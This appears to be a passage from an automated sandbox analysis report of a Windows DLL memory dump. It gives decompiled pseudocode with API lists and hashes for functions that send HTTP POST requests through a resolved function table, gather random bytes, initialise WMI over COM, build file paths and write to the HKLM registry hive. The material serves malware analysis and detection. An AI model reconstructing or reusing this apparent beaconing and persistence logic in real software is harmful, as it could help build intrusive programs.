Part of subcall function 1000D523: CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

SysAllocString.OLEAUT32(00000000), ref: 1000DBE5
SysAllocString.OLEAUT32(00000000), ref: 1000DBF9
SysFreeString.OLEAUT32(?), ref: 1000DF82
SysFreeString.OLEAUT32(?), ref: 1000DF8B

Part of subcall function 1000861A: HeapFree.KERNEL32(00000000,00000000,00000001), ref: 10008660

Strings

FALSE, xrefs: 1000DDAE
TRUE, xrefs: 1000DDA7

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$Alloc$Free$HeapInitialize$BlanketCreateInstanceProxySecurity
String ID: FALSE$TRUE
API String ID: 224402418-1412513891
Opcode ID: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction ID: 5411e9e7cadc0f68074cac65ab41d21575f1dfdd33ecf7b2672d11ac1b24c815
Opcode Fuzzy Hash: 95ff9ab5d061d96dc60c0cf74fe266a414f7d2914be56b1a19689f674a06e878
Instruction Fuzzy Hash: 13E16375D002199FEB15EFE4C885EEEBBB9FF48380F10415AF505AB259DB31AA01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 1000E668, Relevance: 15.3, APIs: 9, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E1000E668(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr _a24) {
				char _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				int _v76;
				void* _v80;
				intOrPtr _v100;
				int _v104;
				void* _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				char* _v120;
				void _v124;
				char _v140;
				void _v396;
				void _v652;
				intOrPtr _t105;
				intOrPtr _t113;
				intOrPtr* _t115;
				intOrPtr _t118;
				intOrPtr _t121;
				intOrPtr _t124;
				intOrPtr _t127;
				intOrPtr _t131;
				char _t133;
				intOrPtr _t136;
				char _t138;
				char _t139;
				intOrPtr _t141;
				intOrPtr _t147;
				intOrPtr _t154;
				intOrPtr _t158;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr _t166;
				intOrPtr _t172;
				intOrPtr _t176;
				void* _t183;
				void* _t185;
				intOrPtr _t186;
				char _t195;
				intOrPtr _t203;
				intOrPtr _t204;
				signed int _t209;
				void _t212;
				intOrPtr _t213;
				void* _t214;
				intOrPtr _t216;
				char _t217;
				intOrPtr _t218;
				signed int _t219;
				signed int _t220;
				void* _t221;

				_v40 = _v40 & 0x00000000;
				_v24 = 4;
				_v36 = 1;
				_t214 = __edx;
				memset( &_v396, 0, 0x100);
				memset( &_v652, 0, 0x100);
				_v64 = E100095C7(0x85b);
				_v60 = E100095C7(0xdc9);
				_v56 = E100095C7(0x65d);
				_v52 = E100095C7(0xdd3);
				_t105 = E100095C7(0xb74);
				_v44 = _v44 & 0;
				_t212 = 0x3c;
				_v48 = _t105;
				memset( &_v124, 0, 0x100);
				_v116 = 0x10;
				_v120 =  &_v140;
				_v124 = _t212;
				_v108 =  &_v396;
				_v104 = 0x100;
				_v80 =  &_v652;
				_push( &_v124);
				_push(0);
				_v76 = 0x100;
				_push(E1000C379(_t214));
				_t113 =  *0x1001e6a4; // 0x0
				_push(_t214);
				if( *((intOrPtr*)(_t113 + 0x28))() != 0) {
					_t209 = 0;
					_v20 = 0;
					do {
						_t115 =  *0x1001e6a4; // 0x0
						_v12 = 0x8404f700;
						_t213 =  *_t115( *0x1001e788,  *((intOrPtr*)(_t221 + _t209 * 4 - 0x24)), 0, 0, 0);
						if(_t213 != 0) {
							_t195 = 3;
							_t185 = 4;
							_v8 = _t195;
							_t118 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t118 + 0x14))(_t213, _t195,  &_v8, _t185);
							_v8 = 0x3a98;
							_t121 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t121 + 0x14))(_t213, 2,  &_v8, _t185);
							_v8 = 0x493e0;
							_t124 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t124 + 0x14))(_t213, 6,  &_v8, _t185);
							_v8 = 0x493e0;
							_t127 =  *0x1001e6a4; // 0x0
							 *((intOrPtr*)(_t127 + 0x14))(_t213, 5,  &_v8, _t185);
							_t131 =  *0x1001e6a4; // 0x0
							_t186 =  *((intOrPtr*)(_t131 + 0x1c))(_t213,  &_v396, _v100, 0, 0, 3, 0, 0);
							if(_a24 != 0) {
								E1000980C(_a24);
							}
							if(_t186 != 0) {
								_t133 = 0x8484f700;
								if(_v112 != 4) {
									_t133 = _v12;
								}
								_t136 =  *0x1001e6a4; // 0x0
								_t216 =  *((intOrPtr*)(_t136 + 0x20))(_t186, "POST",  &_v652, 0, 0,  &_v64, _t133, 0);
								_v8 = _t216;
								if(_a24 != 0) {
									E1000980C(_a24);
								}
								if(_t216 != 0) {
									_t138 = 4;
									if(_v112 != _t138) {
										L19:
										_t139 = E100095C7(0x777);
										_t217 = _t139;
										_v12 = _t217;
										_t141 =  *0x1001e6a4; // 0x0
										_t218 = _v8;
										_v28 =  *((intOrPtr*)(_t141 + 0x24))(_t218, _t217, E1000C379(_t217), _a4, _a8);
										E100085C2( &_v12);
										if(_a24 != 0) {
											E1000980C(_a24);
										}
										if(_v28 != 0) {
											L28:
											_v24 = 8;
											_push(0);
											_v32 = 0;
											_v28 = 0;
											_push( &_v24);
											_push( &_v32);
											_t147 =  *0x1001e6a4; // 0x0
											_push(0x13);
											_push(_t218);
											if( *((intOrPtr*)(_t147 + 0xc))() != 0) {
												_t219 = E10009749( &_v32);
												if(_t219 == 0xc8) {
													 *_a20 = _v8;
													 *_a12 = _t213;
													 *_a16 = _t186;
													return 0;
												}
												_t220 =  ~_t219;
												L32:
												_t154 =  *0x1001e6a4; // 0x0
												 *((intOrPtr*)(_t154 + 8))(_v8);
												L33:
												if(_t186 != 0) {
													_t158 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t158 + 8))(_t186);
												}
												if(_t213 != 0) {
													_t203 =  *0x1001e6a4; // 0x0
													 *((intOrPtr*)(_t203 + 8))(_t213);
												}
												return _t220;
											}
											GetLastError();
											_t220 = 0xfffffff8;
											goto L32;
										} else {
											GetLastError();
											_t162 =  *0x1001e6a4; // 0x0
											 *((intOrPtr*)(_t162 + 8))(_t218);
											_t218 = 0;
											goto L23;
										}
									}
									_v12 = _t138;
									_push( &_v12);
									_push( &_v16);
									_t172 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t172 + 0x18))() == 0) {
										L18:
										GetLastError();
										goto L19;
									}
									_v16 = _v16 | 0x00003380;
									_push(4);
									_push( &_v16);
									_t176 =  *0x1001e6a4; // 0x0
									_push(0x1f);
									_push(_t216);
									if( *((intOrPtr*)(_t176 + 0x14))() != 0) {
										goto L19;
									}
									goto L18;
								} else {
									GetLastError();
									L23:
									_t164 =  *0x1001e6a4; // 0x0
									 *((intOrPtr*)(_t164 + 8))(_t186);
									_t186 = 0;
									goto L24;
								}
							} else {
								GetLastError();
								L24:
								_t166 =  *0x1001e6a4; // 0x0
								 *((intOrPtr*)(_t166 + 8))(_t213);
								_t213 = 0;
								goto L25;
							}
						}
						GetLastError();
						L25:
						_t204 = _t218;
						_t209 = _v20 + 1;
						_v20 = _t209;
					} while (_t209 < 2);
					_v8 = _t218;
					if(_t204 != 0) {
						goto L28;
					}
					_t220 = 0xfffffffe;
					goto L33;
				}
				_t183 = 0xfffffffc;
				return _t183;
			}

APIs

memset.MSVCRT ref: 1000E69A
memset.MSVCRT ref: 1000E6AB
memset.MSVCRT ref: 1000E700
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 1000E785

Strings

POST, xrefs: 1000E84B

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction ID: 0700470c0a68c42d93125f8ed8f5d74d0b9e7f5cef555f12c6cb43bca8eeeaa5
Opcode Fuzzy Hash: 9666fa5b7544119ad2a1acce946c7c4cd061c2ef1cd09bcb1a5d5842fa234375
Instruction Fuzzy Hash: ACB14CB1900258AFEB55CFA4CC88E9E7BF8EF48390F108069F505EB291DB749E44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 100116B8, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E100116B8(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,1000765A,?,?,00000000,?), ref: 100116CB
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA,?,?,00000000,?), ref: 100116E3
GetProcAddress.KERNEL32(00000000,CryptGenRandom,?,?,00000000,?), ref: 100116F2
GetProcAddress.KERNEL32(00000000,CryptReleaseContext,?,?,00000000,?), ref: 10011701

Strings

CryptAcquireContextA, xrefs: 100116DD
CryptGenRandom, xrefs: 100116EC
CryptReleaseContext, xrefs: 100116FB
advapi32.dll, xrefs: 100116C3

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction ID: d36a475728834fa58dcafee8eb85b3ba20c501ff2e9645169ff1056c09a1da39
Opcode Fuzzy Hash: 20942a7a4906dbf7eb0602444a63a434b6f70734ef2710fea449a0a33fd0044b
Instruction Fuzzy Hash: 57117735D04615BBDB52DBAA8C84EEF7BF9EF45680F010064EA15FA240DB30DB408764

Uniqueness

Uniqueness Score: -1.00%

Function 10012122, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E10012122(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L10012285();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L100122CD();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E10008706(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x100109b2
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

APIs

_snprintf.MSVCRT ref: 10012146
localeconv.MSVCRT ref: 10012161
strchr.MSVCRT ref: 10012173
strchr.MSVCRT ref: 10012184
strchr.MSVCRT ref: 10012192
strchr.MSVCRT ref: 100121B7

Strings

%.*g, xrefs: 1001213D

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction ID: 8636af6e6c8ef7ea176c693fecce787b547d9a6025bf48258b91e4e7d6eda4ac
Opcode Fuzzy Hash: c4e2036c81f1f18131b8e055db18669b76aa49e64ef9a1be148b7d3467e3c398
Instruction Fuzzy Hash: 562138FA6046567AD311CA689CC6B5E3BDCDF15260F250115FE509E182E674ECF483A0

Uniqueness

Uniqueness Score: -1.00%

Function 100102B2, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 10010332
qsort.MSVCRT ref: 100105B0

Strings

false, xrefs: 10010315
%I64d, xrefs: 10010324
null, xrefs: 100102F7
true, xrefs: 10010309

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction ID: b3da69db5d3f4e878d7882629df3b6b2364259ca5c53272952ed0c313758977d
Opcode Fuzzy Hash: 27ee6084afeff88239f383b3bb26a63d700df7a8d62648484173ceb74af6d73e
Instruction Fuzzy Hash: BCE150B1A0024ABBDF11DE64CC45EEF3BA9EF45384F108015FD549E141EBB5EAE19BA0

Uniqueness

Uniqueness Score: -1.00%

Function 10004A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E10004A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x1001e688; // 0x7900590
					_t125 =  *0x1001e68c; // 0x797fc68
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E1000BB8D(_t187) != 0) {
					L4:
					_t134 = _t128;
					_t66 = E1000B7A8(_t134,  &_v516);
					_push(_t134);
					_v1104 = _t66;
					E1000B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E100049C7( &_v1076,  &_v1076, _t206);
					_t141 = E1000D400( &_v1076, E1000C379( &_v1076), 0);
					E1000B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E10002C8F(_t187,  &_v1076, _t206, _t208);
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E100092E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x1001e688; // 0x7900590
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E100091E3(_v1112);
								_t145 = _t130;
								 *0x1001e740 = _t76;
								 *0x1001e738 = E100091E3(_t145);
								L17:
								_push(_t145);
								_t188 = E10009B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100);
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x1001b9ca);
								E10009F48(0xe);
								E10009F6C(_t188, _t208, _t130);
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb;
								E1000A0AB(_t188, _t178, _t208);
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E1000A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E1000A3ED(_t188, _t180, _t208);
								}
								_t87 = E1000980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2;
								_t89 = E1000A0AB(_t153, _t181, _t208);
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x1001e688; // 0x7900590
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E1000FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x1001e688; // 0x7900590
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E1000E23E(_t183);
										}
										E100052C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x1001e688; // 0x7900590
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E1000109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E100085D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0x79007b8
									_t153 = _t51;
									L25:
									_t90 = E1000553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x1001e688; // 0x7900590
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E1000C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x1001e684; // 0x797faa0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x1001e684; // 0x797faa0
								 *((intOrPtr*)(_t109 + 0x30))();
								E1000861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E1000861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E1000E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E100095E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E1000BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E100085D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E10002BA4( &_v1044, _t192, 0x105);
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

APIs

memset.MSVCRT ref: 10004A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D1F
lstrcatW.KERNEL32 ref: 10004D3D
lstrcatW.KERNEL32 ref: 10004D41
lstrcatW.KERNEL32 ref: 10004D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 10004D4F

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction ID: f7566e60c9d6103eeec9fdfcf7230380432adf105638aba250afc4f9be1d7fc6
Opcode Fuzzy Hash: 9c0abdd94eabe914945b90b3f23502be936d310f05b3141c419733170b2e759b
Instruction Fuzzy Hash: 60919AB5604305AFF314DB20CC86F6E73E9EB84390F12492EF5958B299EF70E9448B56

Uniqueness

Uniqueness Score: -1.00%

Function 1000D748, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 1000D75C
SysAllocString.OLEAUT32(?), ref: 1000D764
SysAllocString.OLEAUT32(00000000), ref: 1000D778
SysFreeString.OLEAUT32(?), ref: 1000D7F3
SysFreeString.OLEAUT32(?), ref: 1000D7F6
SysFreeString.OLEAUT32(?), ref: 1000D7FB

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction ID: 27e2c139421265cbd0753a0a77cd0a813644ebbf917d6f260799ceccbc4dcd54
Opcode Fuzzy Hash: 29a52338a57cec81f6671dbadbd3888b240f1232313cc897351bf5da0bc70bfa
Instruction Fuzzy Hash: BC21FB75900219BFDB01DFA5CC88DAFBBBDEF48294B10449AF505A7250EA71AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 100107F7, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

\u%04X\u%04X, xrefs: 10010950
\u%04X, xrefs: 10010911
@, xrefs: 10010865

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction ID: 18f8f7fd9c3af9e43ea2b41f69ba211a484cfe72345a25ce6a4dcd653cb28466
Opcode Fuzzy Hash: 546ce5fa566931b67c5079da5f298430883b327ac1d9d5cea2f582d755a7ec14
Instruction Fuzzy Hash: F1411932B04145A7EB24CA988DA5BAE3AA8DF44384F200115FDC6DE296D6F5CED1C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 1000D523, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E1000D523(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x1001b848, 0, 1, 0x1001b858, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E10008604(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

APIs

CoInitializeEx.OLE32(00000000,00000000), ref: 1000D536
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 1000D547
CoCreateInstance.OLE32(1001B848,00000000,00000001,1001B858,?), ref: 1000D55E
SysAllocString.OLEAUT32(00000000), ref: 1000D569
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 1000D594

Part of subcall function 10008604: HeapAlloc.KERNEL32(00000008,?,?,10008F84,00000100,?,10005FCB), ref: 10008612

Memory Dump Source

Source File: 0000000D.00000002.632780616.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000D.00000002.632765623.0000000010000000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocInitialize$BlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 2855449287-0
Opcode ID: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction ID: 5bbdf4e47082d7f099f202f2147c83233ba5ae9393f0558d240139af4bbb2059
Opcode Fuzzy Hash: e3036c98c6c22c681c85725f4620ce73059aed9228951fa92778f01e46537caa
Instruction Fuzzy Hash: A6210931600255BBEB249B66CC4DE6FBFBCEFC6B55F11415EB901A6290DB70DA00CA30

Uniqueness

Uniqueness Score: -1.00%

Function 100121FF, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E100121FF(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L100122CD();
